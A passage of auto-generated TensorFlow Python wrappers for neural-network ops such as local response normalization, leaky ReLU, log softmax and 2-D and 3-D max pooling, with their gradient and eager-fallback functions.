input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
4-D.
depth_radius: An optional `int`. Defaults to `5`.
0-D. Half-width of the 1-D normalization window.
bias: An optional `float`. Defaults to `1`.
An offset (usually positive to avoid dividing by 0).
alpha: An optional `float`. Defaults to `1`.
A scale factor, usually positive.
beta: An optional `float`. Defaults to `0.5`. An exponent.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LRN", name, input, "depth_radius", depth_radius, "bias", bias,
"alpha", alpha, "beta", beta)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return lrn_eager_fallback(
input, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
lrn, (), dict(input=input, depth_radius=depth_radius, bias=bias,
alpha=alpha, beta=beta, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LRN", input=input, depth_radius=depth_radius, bias=bias, alpha=alpha,
beta=beta, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
lrn, (), dict(input=input, depth_radius=depth_radius, bias=bias,
alpha=alpha, beta=beta, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("depth_radius", _op._get_attr_int("depth_radius"), "bias",
_op.get_attr("bias"), "alpha", _op.get_attr("alpha"), "beta",
_op.get_attr("beta"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LRN", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LRN = tf_export("raw_ops.LRN")(_ops.to_raw_op(lrn))
def lrn_eager_fallback(input, depth_radius, bias, alpha, beta, name, ctx):
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
_inputs_flat = [input]
_attrs = ("depth_radius", depth_radius, "bias", bias, "alpha", alpha,
"beta", beta, "T", _attr_T)
_result = _execute.execute(b"LRN", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LRN", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def lrn_grad(input_grads, input_image, output_image, depth_radius=5, bias=1, alpha=1, beta=0.5, name=None):
r"""Gradients for Local Response Normalization.
Args:
input_grads: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
4-D with shape `[batch, height, width, channels]`.
input_image: A `Tensor`. Must have the same type as `input_grads`.
4-D with shape `[batch, height, width, channels]`.
output_image: A `Tensor`. Must have the same type as `input_grads`.
4-D with shape `[batch, height, width, channels]`.
depth_radius: An optional `int`. Defaults to `5`. A depth radius.
bias: An optional `float`. Defaults to `1`.
An offset (usually > 0 to avoid dividing by 0).
alpha: An optional `float`. Defaults to `1`.
A scale factor, usually positive.
beta: An optional `float`. Defaults to `0.5`. An exponent.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input_grads`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LRNGrad", name, input_grads, input_image, output_image,
"depth_radius", depth_radius, "bias", bias, "alpha", alpha, "beta",
beta)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return lrn_grad_eager_fallback(
input_grads, input_image, output_image, depth_radius=depth_radius,
bias=bias, alpha=alpha, beta=beta, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LRNGrad", input_grads=input_grads, input_image=input_image,
output_image=output_image, depth_radius=depth_radius,
bias=bias, alpha=alpha, beta=beta, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("depth_radius", _op._get_attr_int("depth_radius"), "bias",
_op.get_attr("bias"), "alpha", _op.get_attr("alpha"), "beta",
_op.get_attr("beta"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LRNGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LRNGrad = tf_export("raw_ops.LRNGrad")(_ops.to_raw_op(lrn_grad))
def lrn_grad_eager_fallback(input_grads, input_image, output_image, depth_radius, bias, alpha, beta, name, ctx):
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input_grads, input_image, output_image], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
(input_grads, input_image, output_image) = _inputs_T
_inputs_flat = [input_grads, input_image, output_image]
_attrs = ("depth_radius", depth_radius, "bias", bias, "alpha", alpha,
"beta", beta, "T", _attr_T)
_result = _execute.execute(b"LRNGrad", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LRNGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def leaky_relu(features, alpha=0.2, name=None):
r"""Computes rectified linear: `max(features, features * alpha)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
alpha: An optional `float`. Defaults to `0.2`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LeakyRelu", name, features, "alpha", alpha)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return leaky_relu_eager_fallback(
features, alpha=alpha, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LeakyRelu", features=features, alpha=alpha, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("alpha", _op.get_attr("alpha"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LeakyRelu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LeakyRelu = tf_export("raw_ops.LeakyRelu")(_ops.to_raw_op(leaky_relu))
def leaky_relu_eager_fallback(features, alpha, name, ctx):
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ], _dtypes.float32)
_inputs_flat = [features]
_attrs = ("alpha", alpha, "T", _attr_T)
_result = _execute.execute(b"LeakyRelu", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LeakyRelu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def leaky_relu_grad(gradients, features, alpha=0.2, name=None):
r"""Computes rectified linear gradients for a LeakyRelu operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding LeakyRelu operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding LeakyRelu operation,
OR the outputs of that operation (both work equivalently).
alpha: An optional `float`. Defaults to `0.2`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LeakyReluGrad", name, gradients, features, "alpha", alpha)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return leaky_relu_grad_eager_fallback(
gradients, features, alpha=alpha, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LeakyReluGrad", gradients=gradients, features=features, alpha=alpha,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("alpha", _op.get_attr("alpha"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LeakyReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LeakyReluGrad = tf_export("raw_ops.LeakyReluGrad")(_ops.to_raw_op(leaky_relu_grad))
def leaky_relu_grad_eager_fallback(gradients, features, alpha, name, ctx):
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ], _dtypes.float32)
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("alpha", alpha, "T", _attr_T)
_result = _execute.execute(b"LeakyReluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LeakyReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def log_softmax(logits, name=None):
r"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax[i, j] = logits[i, j] - log(sum(exp(logits[i])))
Args:
logits: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
2-D with shape `[batch_size, num_classes]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LogSoftmax", name, logits)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return log_softmax_eager_fallback(
logits, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LogSoftmax", logits=logits, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LogSoftmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LogSoftmax = tf_export("raw_ops.LogSoftmax")(_ops.to_raw_op(log_softmax))
def log_softmax_eager_fallback(logits, name, ctx):
_attr_T, (logits,) = _execute.args_to_matching_eager([logits], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [logits]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"LogSoftmax", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LogSoftmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool(input, ksize, strides, padding, explicit_paddings=[], data_format="NHWC", name=None):
r"""Performs max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`, `int64`, `uint8`, `int16`, `int8`, `uint16`, `qint8`.
4-D input to pool over.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW", "NCHW_VECT_C"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "explicit_paddings", explicit_paddings,
"data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool", input=input, ksize=ksize, strides=strides, padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool = tf_export("raw_ops.MaxPool")(_ops.to_raw_op(max_pool))
def max_pool_eager_fallback(input, ksize, strides, padding, explicit_paddings, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.uint16, _dtypes.qint8, ], _dtypes.float32)
_inputs_flat = [input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format", data_format)
_result = _execute.execute(b"MaxPool", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Performs 3D max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
Shape `[batch, depth, rows, cols, channels]` tensor to pool over.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3D", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3D", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3D = tf_export("raw_ops.MaxPool3D")(_ops.to_raw_op(max_pool3d))
def max_pool3d_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPool3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool3d_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes gradients of 3D max pooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3DGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3DGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"), "TInput", _op._get_attr_type("TInput"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3DGrad = tf_export("raw_ops.MaxPool3DGrad")(_ops.to_raw_op(max_pool3d_grad))
def max_pool3d_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
_attr_TInput, _inputs_TInput = _execute.args_to_matching_eager([orig_input, orig_output], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
(orig_input, orig_output) = _inputs_TInput
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T, "TInput", _attr_TInput)
_result = _execute.execute(b"MaxPool3DGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool3d_grad_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3DGradGrad", name, orig_input, orig_output, grad,
"ksize", ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_grad_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3DGradGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3DGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3DGradGrad = tf_export("raw_ops.MaxPool3DGradGrad")(_ops.to_raw_op(max_pool3d_grad_grad))
def max_pool3d_grad_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPool3DGradGrad", 1, inputs=_inputs_flat,
